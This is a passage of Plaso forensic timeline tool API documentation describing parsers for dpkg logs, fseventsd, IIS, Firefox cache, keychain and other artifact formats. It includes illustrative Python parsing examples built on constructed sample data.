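def parse_dpkg_line(line: str) -> Optional[DpkgEvent]:
    """Returns a DpkgEvent for a line in one of the expected forms, else None."""
    line = line.rstrip('\r\n')
    for kind, regex in _LINE_FORMS.items():
        match = regex.match(line)
        if match:
            fields = match.groupdict()
            timestamp = datetime.strptime(
                fields.pop('timestamp'), '%Y-%m-%d %H:%M:%S')
            return DpkgEvent(timestamp, kind, line[_BODY_OFFSET:], fields)
    return None


def verify_dpkg_log(first_line: str) -> bool:
    """Analogue of DpkgParser.VerifyStructure: is the line in an expected form?"""
    return parse_dpkg_line(first_line) is not None


def parse_dpkg_log(text: str) -> Iterator[DpkgEvent]:
    """Yields one DpkgEvent per recognised line; unrecognised lines are skipped
    here, where a Plaso parser would report them through the parser mediator."""
    for line in text.splitlines():
        if not line.strip():
            continue
        event = parse_dpkg_line(line)
        if event is not None:
            yield event


def package_actions(events) -> list:
    """Reduces the events to (timestamp, action, package, available_version)
    tuples, the view an analyst usually wants from dpkg.log."""
    return [(event.timestamp, event.fields['action'], event.fields['package'],
             event.fields['available_version'])
            for event in events if event.kind == 'action']


# Constructed sample log; dpkg writes <none> when a version is absent.
SAMPLE_DPKG_LOG = """\
2016-08-03 15:25:52 startup archives unpack
2016-08-03 15:25:53 install base-passwd:amd64 <none> 3.5.33
2016-08-03 15:25:53 status half-installed base-passwd:amd64 3.5.33
2016-08-03 15:25:54 status unpacked base-passwd:amd64 3.5.33
2016-08-03 15:26:10 startup packages configure
2016-08-03 15:26:10 configure base-passwd:amd64 3.5.33 <none>
2016-08-03 15:26:11 conffile /etc/example.conf keep
this line is not a dpkg record
"""

if __name__ == '__main__':
    for event in parse_dpkg_log(SAMPLE_DPKG_LOG):
        print(event.timestamp, event.kind, event.body)
```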


    VerifyStructure(parser_mediator, line)
        Verifies if a line from a text file is in the expected format.
        Parameters
            • parser_mediator (ParserMediator) – parser mediator.
            • line (str) – line from a text file.
        Returns
            True if the line is in the expected format, False if not.
        Return type
            bool

plaso.parsers.dsv_parser module

Delimiter separated values (DSV) parser interface.

class plaso.parsers.dsv_parser.DSVParser
    Bases: plaso.parsers.interface.FileObjectParser

    Delimiter separated values (DSV) parser interface.

    COLUMNS = []
    DELIMITER = ','
    ESCAPE_CHARACTER = ''
    FIELD_SIZE_LIMIT = 131072

    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns
            format specification.
        Return type
            FormatSpecification

    NUMBER_OF_HEADER_LINES = 0

    ParseFileObject(parser_mediator, file_object)
        Parses a DSV text file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.

    abstract ParseRow(parser_mediator, row_offset, row)
        Parses a line of the log file and produces events.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • row_offset (int) – offset of the line from which the row was extracted.
            • row (dict[str, str]) – fields of a single row, as specified in COLUMNS.

    QUOTE_CHAR = '"'

    abstract VerifyRow(parser_mediator, row)
        Verifies if a line of the file is in the expected format.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
        Returns
            True if this is the correct parser, False otherwise.
        Return type
            bool

plaso.parsers.esedb module

Parser for Extensible Storage Engine (ESE) database files (EDB).

class plaso.parsers.esedb.ESEDBCache
    Bases: plaso.parsers.plugins.BasePluginCache

    A cache storing query results for ESEDB plugins.

    StoreDictInCache(attribute_name, dict_object)
        Store a dict object in cache.
        Parameters
            • attribute_name (str) – name of the attribute.
            • dict_object (dict) – dictionary.

class plaso.parsers.esedb.ESEDBParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parses Extensible Storage Engine (ESE) database files (EDB).

    DATA_FORMAT = 'Extensible Storage Engine (ESE) Database File (EDB) format'

    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns
            format specification.
        Return type
            FormatSpecification

    NAME = 'esedb'

    ParseFileObject(parser_mediator, file_object)
        Parses an ESE database file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.

class plaso.parsers.esedb.ESEDatabase
    Bases: object

    Extensible Storage Engine (ESE) database.

    Close()
        Closes the database.

    GetTableByName(name)
        Retrieves a table by its name.
        Parameters
            name (str) – name of the table.
        Returns
            the table with the corresponding name or None if there is no table with the name.
        Return type
            pyesedb.table

    Open(file_object)
        Opens an Extensible Storage Engine (ESE) database file.
        Parameters
            file_object (dfvfs.FileIO) – file-like object.
        Raises
            • IOError – if the file-like object cannot be read.
            • OSError – if the file-like object cannot be read.
            • ValueError – if the file-like object is missing.

    property tables
        names of all the tables.
        Type list[str]

plaso.parsers.filestat module

File system stat object parser.

class plaso.parsers.filestat.FileStatEventData
    Bases: plaso.containers.events.EventData

    File system stat event data.

    display_name
        display name.
        Type str
    file_entry_type
        dfVFS file entry type.
        Type int
    file_size
        file size in bytes.
        Type int
    file_system_type
        file system type.
        Type str
    filename
        name of the file.
        Type str
    inode
        inode of the file.
        Type int
    is_allocated
        True if the file is allocated.
        Type bool

    DATA_TYPE = 'fs:stat'

class plaso.parsers.filestat.FileStatParser
    Bases: plaso.parsers.interface.FileEntryParser

    Parses file system stat object.

    DATA_FORMAT = 'file system stat information'
    NAME = 'filestat'

    ParseFileEntry(parser_mediator, file_entry)
        Parses a file entry.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_entry (dfvfs.FileEntry) – a file entry.

plaso.parsers.firefox_cache module

Implements a parser for Firefox cache 1 and 2 files.

class plaso.parsers.firefox_cache.BaseFirefoxCacheParser
    Bases: plaso.parsers.interface.FileObjectParser
    Parses Firefox cache files.

class plaso.parsers.firefox_cache.FirefoxCache2Parser
    Bases: plaso.parsers.firefox_cache.BaseFirefoxCacheParser, plaso.lib.dtfabric_helper.DtFabricHelper
    Parses Firefox cache version 2 files (Firefox 32 or later).

    DATA_FORMAT = 'Mozilla Firefox Cache version 2 file (version 32 or later)'
    NAME = 'firefox_cache2'

    ParseFileObject(parser_mediator, file_object)
        Parses a Firefox cache file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

class plaso.parsers.firefox_cache.FirefoxCacheEventData
    Bases: plaso.containers.events.EventData
    Firefox cache event data.

    data_size (int) – size of the cached data.
    fetch_count (int) – number of times the cache entry was fetched.
    frequency (int) – ???
    info_size (int) – size of the metadata.
    location (str) – ???
    request_method (str) – HTTP request method.
    request_size (int) – HTTP request byte size.
    response_code (int) – HTTP response code.
    url (str) – URL of original content.
    version (int) – cache format version.

    DATA_TYPE = 'firefox:cache:record'

class plaso.parsers.firefox_cache.FirefoxCacheParser
    Bases: plaso.parsers.firefox_cache.BaseFirefoxCacheParser, plaso.lib.dtfabric_helper.DtFabricHelper
    Parses Firefox cache version 1 files (Firefox 31 or earlier).

    DATA_FORMAT = 'Mozilla Firefox Cache version 1 file (version 31 or earlier)'
    FIREFOX_CACHE_CONFIG
        alias of plaso.parsers.firefox_cache.firefox_cache_config
    NAME = 'firefox_cache'

    ParseFileObject(parser_mediator, file_object)
        Parses a Firefox cache file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.fseventsd module

Parsers for MacOS fseventsd files.

class plaso.parsers.fseventsd.FseventsdEventData
    Bases: plaso.containers.events.EventData
    MacOS file system event (fseventsd) event data.

    event_identifier (int) – the record event identifier.
    flags (int) – flags stored in the record.
    node_identifier (int) – file system node identifier related to the file system event.
    path (str) – path recorded in the fseventsd record.

    DATA_TYPE = 'macos:fseventsd:record'

class plaso.parsers.fseventsd.FseventsdParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper
    Parser for fseventsd files.
    This parser supports both version 1 and version 2 fseventsd files. Refer to http://nicoleibrahim.com/apple-fsevents-forensics/ for details.

    DATA_FORMAT = 'MacOS File System Events Disk Log Stream (fseventsd) file'
    NAME = 'fseventsd'

    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns: format specification.
        Return type: FormatSpecification

    ParseFileObject(parser_mediator, file_object)
        Parses an fseventsd file.
        Parameters:
            • parser_mediator (ParserMediator) – parser mediator.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises: UnableToParseFile – when the header cannot be parsed.
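The version 1 / version 2 distinction the parser above supports is the one structural edge case a reader of fseventsd records has to handle: both versions carry an event identifier and flags per path, but only version 2 records add a node identifier. The following is an added illustration and not Plaso's own code: a minimal reader for already-decompressed fseventsd pages that switches record layout on the page signature. The layout it assumes (a '1SLD' or '2SLD' signature, four unknown bytes, a little-endian uint32 page size including the header, then records made of a NUL-terminated path, a uint64 event identifier and a uint32 flags value, with version 2 records carrying an extra uint64 node identifier), and the fact that on-disk fseventsd files are gzip-compressed and must be decompressed before this reader sees them, are taken from public write-ups such as the one referenced above and are assumptions of this example. The sample bytes are constructed in the block, as is the helper that builds them.

```python
"""Illustrative reader for decompressed fseventsd DLS1/DLS2 pages (not Plaso code)."""
import struct

# Assumed page header: signature (4 bytes), unknown (uint32), page size (uint32, LE).
PAGE_HEADER = struct.Struct('<4sII')
RECORD_TAIL_V1 = struct.Struct('<QI')   # event identifier, flags
NODE_ID_V2 = struct.Struct('<Q')        # extra node identifier in version 2 records


def parse_fseventsd_pages(data):
    """Return a list of (path, event_identifier, flags, node_identifier) tuples.

    node_identifier is None for version 1 (DLS1) records, which do not carry it.
    Raises ValueError on an unknown signature or a page/record that does not fit.
    """
    records = []
    offset = 0
    while offset + PAGE_HEADER.size <= len(data):
        signature, _unknown, page_size = PAGE_HEADER.unpack_from(data, offset)
        if signature == b'1SLD':
            version = 1
        elif signature == b'2SLD':
            version = 2
        else:
            raise ValueError('unsupported page signature %r at offset %d' % (signature, offset))
        if page_size < PAGE_HEADER.size or offset + page_size > len(data):
            raise ValueError('page size %d out of bounds at offset %d' % (page_size, offset))

        page_end = offset + page_size
        pos = offset + PAGE_HEADER.size
        while pos < page_end:
            # Path is NUL-terminated and must end inside the current page.
            nul = data.find(b'\x00', pos, page_end)
            if nul < 0:
                raise ValueError('unterminated path at offset %d' % pos)
            path = data[pos:nul].decode('utf-8', errors='replace')
            pos = nul + 1

            if pos + RECORD_TAIL_V1.size > page_end:
                raise ValueError('truncated record at offset %d' % pos)
            event_identifier, flags = RECORD_TAIL_V1.unpack_from(data, pos)
            pos += RECORD_TAIL_V1.size

            node_identifier = None
            if version == 2:
                if pos + NODE_ID_V2.size > page_end:
                    raise ValueError('truncated version 2 record at offset %d' % pos)
                (node_identifier,) = NODE_ID_V2.unpack_from(data, pos)
                pos += NODE_ID_V2.size

            records.append((path, event_identifier, flags, node_identifier))
        offset = page_end
    return records


def is_well_formed(data):
    """True if every page and record parses, False on any structural error."""
    try:
        parse_fseventsd_pages(data)
    except ValueError:
        return False
    return True


def build_page(version, records):
    """Constructed helper: serialise records into one page of the assumed layout."""
    body = b''
    for path, event_identifier, flags, node_identifier in records:
        body += path.encode('utf-8') + b'\x00'
        body += RECORD_TAIL_V1.pack(event_identifier, flags)
        if version == 2:
            body += NODE_ID_V2.pack(node_identifier)
    signature = b'1SLD' if version == 1 else b'2SLD'
    return PAGE_HEADER.pack(signature, 0, PAGE_HEADER.size + len(body)) + body


# Constructed sample: one version 1 page followed by one version 2 page.
SAMPLE_DATA = build_page(1, [
    ('Users/alice/Documents/report.txt', 4096, 0x11, None),
    ('Users/alice/Downloads', 4097, 0x80, None),
]) + build_page(2, [
    ('Users/alice/.ssh/authorized_keys', 4098, 0x10, 0xABCD),
])


if __name__ == '__main__':
    for record in parse_fseventsd_pages(SAMPLE_DATA):
        print(record)
```

Feeding the reader a page whose declared size exceeds the remaining bytes, or a record whose path has no terminator before the page ends, raises ValueError rather than reading past the buffer; a timeline tool that used this as its parser would treat that the same way FseventsdParser reports UnableToParseFile for a bad header.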

plaso.parsers.gdrive_synclog module

Parser for Google Drive Sync log files.

class plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventData
    Bases: plaso.containers.events.EventData
    Google Drive Sync log event data.

    log_level (str) – logging level of event such as “DEBUG”, “WARN”, “INFO”, “ERROR”.
    message (str) – log message.
    pid (int) – process identifier of process which logged event.
    source_code (str) – filename:line_number of source file which logged event.
    thread (str) – colon-separated thread identifier in the form “ID:name” which logged event.

    DATA_TYPE = 'gdrive_sync:log:line'

class plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParser
    Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
    Parses events from Google Drive Sync log files.

    BUFFER_SIZE = 16384
    DATA_FORMAT = 'Google Drive Sync log file'
    LINE_STRUCTURES = [('logline', {{{{{{Group:({{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}} W:(0123...)}) W:(ABCD...)} W:(0123...)} W:(0123...)} W:(0123...)} SkipTo:({StringEnd | Group:({{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}} W:(0123...)})})} [lineEnd]...})]
    NAME = 'gdrive_synclog'

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, lines)
        Verify that this file is a Google Drive Sync log file.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • lines (str) – one or more lines from the text file.
        Returns: True if this is the correct parser, False otherwise.
        Return type: bool

plaso.parsers.google_logging module

Parser for Google-formatted log files.

class plaso.parsers.google_logging.GoogleLogEventData(data_type='googlelog:log')
    Bases: plaso.containers.events.EventData
    Google-formatted log file event data. See: https://github.com/google/glog. This format is also used by Kubernetes, see https://github.com/kubernetes/klog

    file_name (str) – the name of the source file that logged the message.
    line_number (int) – the line number in the source file where the logging statement is.
    message (str) – the log message.
    priority (str) – the priority of the message: I, W, E or F. These values represent messages logged at INFO, WARNING, ERROR or FATAL severities, respectively.
    thread_identifier (int) – the identifier of the thread that recorded the message.

    DATA_TYPE = 'googlelog:log'

class plaso.parsers.google_logging.GoogleLogParser
    Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
    Parser for Google-formatted log files.

    DATA_FORMAT = 'Google-formatted log file'
    LINE_STRUCTURES = [('log_entry', {{{{{{{{I | W | E | F {{{{{{{W:(0123...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]}} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:("] ")} Re:('.*?(?=($|\n[IWEF][0-9]{4}))')} lineEnd}), ('greeting_start', "Log file created at: "), ('greeting', {{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Re:('.*?(?=($|\n[IWEF][0-9]{4}))')} lineEnd})]
    NAME = 'googlelog'

    ParseRecord(parser_mediator, key, structure)
        Parses a matching entry.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – elements parsed from the file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, lines)
        Verifies that this is a Google log-formatted file.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • lines (str) – one or more lines from the text file.
        Returns: True if this is the correct parser, False otherwise.
        Return type: bool

plaso.parsers.iis module

Parser for Windows IIS Log file.
More documentation on fields can be found here: https://msdn.microsoft.com/en-us/library/ms525807(v=vs.90).aspx

class plaso.parsers.iis.IISEventData
    Bases: plaso.containers.events.EventData
    IIS log event data.

    cs_cookie (str) – Content of a sent or received cookie.
    cs_host (str) – HTTP host header name.
    cs_referrer (str) – Site that referred to the requested site.
    cs_uri_query (str) – URI query that was requested.
    cs_username (str) – Username of the authenticated user that accessed the server, where anonymous users are indicated by a hyphen.
    dest_ip (str) – IP address of the server that generated the logged activity.
    dest_port (str) – Server port number.
    http_method (str) – HTTP request method, such as GET or POST.
    http_status (str) – HTTP status code that was returned by the server.
    protocol_version (str) – HTTP protocol version that was used.
    received_bytes (str) – Number of bytes received and processed by the server.
    requested_uri_stem (str) – File requested, such as index.php or Default.htm.
    s_computername (str) – Name of the server that generated the logged activity.
    sc_substatus (str) – HTTP substatus error code that was returned by the server.
    sc_win32_status (str) – Windows status code of the server.
    sent_bytes (str) – Number of bytes sent by the server.
    source_ip (str) – IP address of the client that made the request.
    s_sitename (str) – Service name and instance number that was running on the client.
    time_taken (str) – Time taken, in milliseconds, to process the request.
    user_agent (str) – User agent that was used.

    DATA_TYPE = 'iis:log:line'

class plaso.parsers.iis.WinIISParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
    Parses a Microsoft IIS log file.

    BLANK = "-"
    COMMENT = {"#" {{{"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} | {"Fields:" SkipTo:(LineEnd)}} | SkipTo:(LineEnd)}}
    DATA_FORMAT = 'Microsoft IIS log file'
    DATE_METADATA = {"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}}
    DATE_TIME = {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}
    FIELDS_METADATA = {"Fields:" SkipTo:(LineEnd)}
    INTEGER = {W:(0123...) | "-"}
    IP_ADDRESS = {{IPv4 address | IPv6 address} | "-"}
    LINE_STRUCTURES = [('comment', {"#" {{{"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} | {"Fields:" SkipTo:(LineEnd)}} | SkipTo:(LineEnd)}}), ('logline', {{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}})]
    LOG_LINE_6_0 = {{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}}
    MAX_LINE_LENGTH = 800
    NAME = 'winiis'
    PORT = {W:(0123...) | "-"}
    QUERY = {W:(ABCD...) | "-"}
    URI = {W:(ABCD...) | "-"}
    USERNAME = {W:(ABCD...) | "-"}
    WORD = {W:(ABCD...) | "-"}

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – structure parsed from the log file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is an IIS log file.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.
        Returns: True if the line was successfully parsed.
        Return type: bool

plaso.parsers.interface module

The parsers and plugins interface classes.

class plaso.parsers.interface.BaseFileEntryFilter
    Bases: object
    File entry filter interface.

    abstract Match(file_entry)
        Determines if a file entry matches the filter.
        Parameters: file_entry (dfvfs.FileEntry) – a file entry.
        Returns: True if the file entry matches the filter.
        Return type: bool

class plaso.parsers.interface.BaseParser
    Bases: object
    The parser interface.

    ALL_PLUGINS = {'*'}
    DATA_FORMAT = ''
    FILTERS = frozenset({})
    NAME = 'base_parser'

    classmethod DeregisterPlugin(plugin_class)
        Deregisters a plugin class.
        The plugin classes are identified based on their lower case name.
        Parameters: plugin_class (type) – class of the plugin.
        Raises: KeyError – if plugin class is not set for the corresponding name.

    EnablePlugins(plugin_includes)
        Enables parser plugins.
        Parameters: plugin_includes (set[str]) – names of the plugins to enable, where set([‘*’]) represents all plugins. Note the default plugin, if it exists, is always enabled and cannot be disabled.

    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns: a format specification or None if not available.
        Return type: FormatSpecification

    classmethod GetPluginNames()
        Retrieves the names of registered plugins.
        Returns: names of the plugins.
        Return type: list[str]

    classmethod GetPluginObjectByName(plugin_name)
        Retrieves a specific plugin object by its name.
        Parameters: plugin_name (str) – name of the plugin.
        Returns: a plugin object or None if not available.
        Return type: BasePlugin

    classmethod GetPlugins()
        Retrieves the registered plugins.
        Yields: tuple[str, type] – name and class of the plugin.

    classmethod RegisterPlugin(plugin_class)
        Registers a plugin class.
        The plugin classes are identified based on their lower case name.
        Parameters: plugin_class (type) – class of the plugin.
        Raises: KeyError – if plugin class is already set for the corresponding name.

    classmethod RegisterPlugins(plugin_classes)
        Registers plugin classes.
        Parameters: plugin_classes (list[type]) – classes of plugins.
        Raises: KeyError – if plugin class is already set for the corresponding name.

    classmethod SupportsPlugins()
        Determines if a parser supports plugins.
        Returns: True if the parser supports plugins.
        Return type: bool

class plaso.parsers.interface.FileEntryParser
    Bases: plaso.parsers.interface.BaseParser
    The file entry parser interface.

    Parse(parser_mediator)
        Parses the file entry and extracts event objects.
        Parameters: parser_mediator (ParserMediator) – a parser mediator.
        Raises: UnableToParseFile – when the file cannot be parsed.

    abstract ParseFileEntry(parser_mediator, file_entry)
        Parses a file entry.
        Parameters:
            • parser_mediator (ParserMediator) – a parser mediator.
            • file_entry (dfvfs.FileEntry) – a file entry to parse.
        Raises: UnableToParseFile – when the file cannot be parsed.

class plaso.parsers.interface.FileNameFileEntryFilter(filename)
    Bases: plaso.parsers.interface.BaseFileEntryFilter
    File name file entry filter.

    Match(file_entry)
        Determines if a file entry matches the filter.
        Parameters: file_entry (dfvfs.FileEntry) – a file entry.
        Returns: True if the file entry matches the filter.
        Return type: bool

class plaso.parsers.interface.FileObjectParser
    Bases: plaso.parsers.interface.BaseParser
    The file-like object parser interface.

    Parse(parser_mediator, file_object)
        Parses a single file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – a parser mediator.
            • file_object (dfvfs.FileIO) – a file-like object to parse.
        Raises: UnableToParseFile – when the file cannot be parsed.

    abstract ParseFileObject(parser_mediator, file_object)
        Parses a file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – a parser mediator.
            • file_object (dfvfs.FileIO) – a file-like object to parse.
        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.java_idx module

Parser for Java Cache IDX files.

class plaso.parsers.java_idx.JavaIDXEventData
    Bases: plaso.containers.events.EventData
    Java IDX cache file event data.

    idx_version (str) – format version of IDX file.
    ip_address (str) – IP address of the host in the URL.
    url (str) – URL of the downloaded file.

    DATA_TYPE = 'java:download:idx'

class plaso.parsers.java_idx.JavaIDXParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper
    Parser for Java WebStart Cache IDX files.
    There are five structures defined. 6.02 files had one generic section that retained all data. From 6.03, the file went to a multi-section format where later sections were optional and had variable lengths. 6.03, 6.04, and 6.05 files all have their main data section (#2) begin at offset 128. The short structure is because 6.05 files deviate after the 8th byte. So, grab the first 8 bytes to ensure it’s valid, get the file version, then continue on with the correct structures.

    DATA_FORMAT = 'Java WebStart Cache IDX file'
    NAME = 'java_idx'

    ParseFileObject(parser_mediator, file_object)
        Parses a Java WebStart Cache IDX file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object to parse.
        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.logger module

The parsers sub module logger.

plaso.parsers.mac_appfirewall module

Parser for MacOS Application firewall log (appfirewall.log) files.

class plaso.parsers.mac_appfirewall.MacAppFirewallLogEventData
    Bases: plaso.containers.events.EventData
    MacOS Application firewall log (appfirewall.log) file event data.

    action (str) – action.
    agent (str) – agent that saved the log.
    computer_name (str) – name of the computer.
    process_name (str) – name of the entity that tried to do the action.
    status (str) – saved status action.

    DATA_TYPE = 'mac:appfirewall:line'

class plaso.parsers.mac_appfirewall.MacAppFirewallParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
    Parser for MacOS Application firewall log (appfirewall.log) files.

    DATA_FORMAT = 'MacOS Application firewall log (appfirewall.log) file'
    DATE_TIME = Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})
    FIREWALL_LINE = {{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) W:(0123...)} W:(0123...)} Suppress:("<")} !W:(>)} Suppress:(">:")} !W:(:)} ":"} SkipTo:(lineEnd)}
    LINE_STRUCTURES = [('logline', {{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) W:(0123...)} W:(0123...)} Suppress:("<")} !W:(>)} Suppress:(">:")} !W:(:)} ":"} SkipTo:(lineEnd)}), ('repeated', {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("---")} !W:(---)} Suppress:("---")})]
    NAME = 'mac_appfirewall_log'
    REPEATED_LINE = {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("---")} !W:(---)} Suppress:("---")}

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a Mac AppFirewall log file.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.
        Returns: True if the line is in the expected format, False if not.
        Return type: bool

plaso.parsers.mac_keychain module

Parser for MacOS keychain database files.

class plaso.parsers.mac_keychain.KeychainApplicationRecordEventData
    Bases: plaso.containers.events.EventData
    MacOS keychain application password record event data.

    account_name (str) – name of the account.
    comments (str) – comments added by the user.
    entry_name (str) – name of the entry.
    ssgp_hash (str) – password/certificate hash formatted as an hexadecimal string.
    text_description (str) – description.

    DATA_TYPE = 'mac:keychain:application'

class plaso.parsers.mac_keychain.KeychainDatabaseColumn
    Bases: object
    MacOS keychain database column.

    attribute_data_type (int) – attribute (data) type.
    attribute_identifier (int) – attribute identifier.
    attribute_name (str) – attribute name.

class plaso.parsers.mac_keychain.KeychainDatabaseTable
    Bases: object
    MacOS keychain database table.

    columns (list[KeychainDatabaseColumn]) – columns.
    records (list[dict[str, str]]) – records.
    relation_identifier (int) – relation identifier.
    relation_name (str) – relation name.

class plaso.parsers.mac_keychain.KeychainInternetRecordEventData
    Bases: plaso.containers.events.EventData
    MacOS keychain internet record event data.

    account_name (str) – name of the account.
    comments (str) – comments added by the user.
    entry_name (str) – name of the entry.
    protocol (str) – internet protocol used, for example “https”.
    ssgp_hash (str) – password/certificate hash formatted as an hexadecimal string.
    text_description (str) – description.
    type_protocol (str) – sub-protocol used, for example “form”.
    where (str) – domain name or IP where the password is used.

    DATA_TYPE = 'mac:keychain:internet'

class plaso.parsers.mac_keychain.KeychainParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper
    Parser for MacOS keychain database files.

    DATA_FORMAT = 'MacOS keychain database file'
    NAME = 'mac_keychain'

